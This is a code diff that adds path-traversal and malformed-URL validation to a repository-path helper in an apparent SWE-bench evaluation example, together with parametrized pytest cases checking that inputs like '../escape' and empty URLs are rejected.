@@ async def setup_repository( self.active_repos[str(repo_path)] = context return context - async def cleanup(self): + async def cleanup(self) -> None: """Clean up all managed repositories. Removes all cloned repository directories and clears the active repos cache. @@ -87,7 +87,7 @@ async def cleanup(self): for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): - shutil.rmtree(repo_path) + await asyncio.to_thread(shutil.rmtree, repo_path) self.active_repos.clear() @@ -103,15 +103,32 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N Path to the repository. If instance_id is provided, returns workspace_dir/instance_id/org/repo for complete isolation. Otherwise returns workspace_dir/org/repo. + + Raises: + ValueError: If instance_id contains path traversal characters or repo_url is malformed. """ + # Sanitize instance_id to prevent path traversal attacks + if instance_id: + if ".." in instance_id or "/" in instance_id or "\\" in instance_id: + raise ValueError(f"Invalid instance_id: contains path traversal characters: {instance_id}") + + # Parse repo URL to extract org and repo names if "://" in repo_url: path = urlparse(repo_url).path else: # SSH form: git@host:org/repo.git path = repo_url.split(":", 1)[-1] + parts = path.strip("/").split("/") + if len(parts) < 2: + raise ValueError(f"Invalid repo_url: cannot extract org/repo from: {repo_url}") + repo_name = parts[-1].replace('.git', '') - org_name = parts[-2] # Organization name + org_name = parts[-2] + + # Validate extracted names are not empty + if not org_name or not repo_name: + raise ValueError(f"Invalid repo_url: empty org or repo name from: {repo_url}") # If instance_id is provided, create isolated workspace per instance if instance_id: diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 14f00cba5c..0eaeadc9d3 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -427,7 +427,42 @@ def test_ssh_url_parsing(self, tmp_path): assert "org" in str(path) assert "repo" in str(path) - assert "test-123" in str(path) + + @pytest.mark.parametrize("invalid_instance_id", [ + "../escape", + "foo/../bar", + "foo/bar", + "foo\\bar", + "..\\escape", + ]) + def test_instance_id_path_traversal_blocked(self, tmp_path, invalid_instance_id): + """Test that path traversal in instance_id is rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, repo_url, instance_id=invalid_instance_id) + + assert "path traversal" in str(exc_info.value).lower() + + @pytest.mark.parametrize("invalid_url", [ + "not-a-url", + "https://github.com/", + "https://github.com", + "", + ]) + def test_malformed_repo_url_rejected(self, tmp_path, invalid_url): + """Test that malformed repo URLs are rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, invalid_url) + + assert "invalid" in str(exc_info.value).lower() # =============================================================================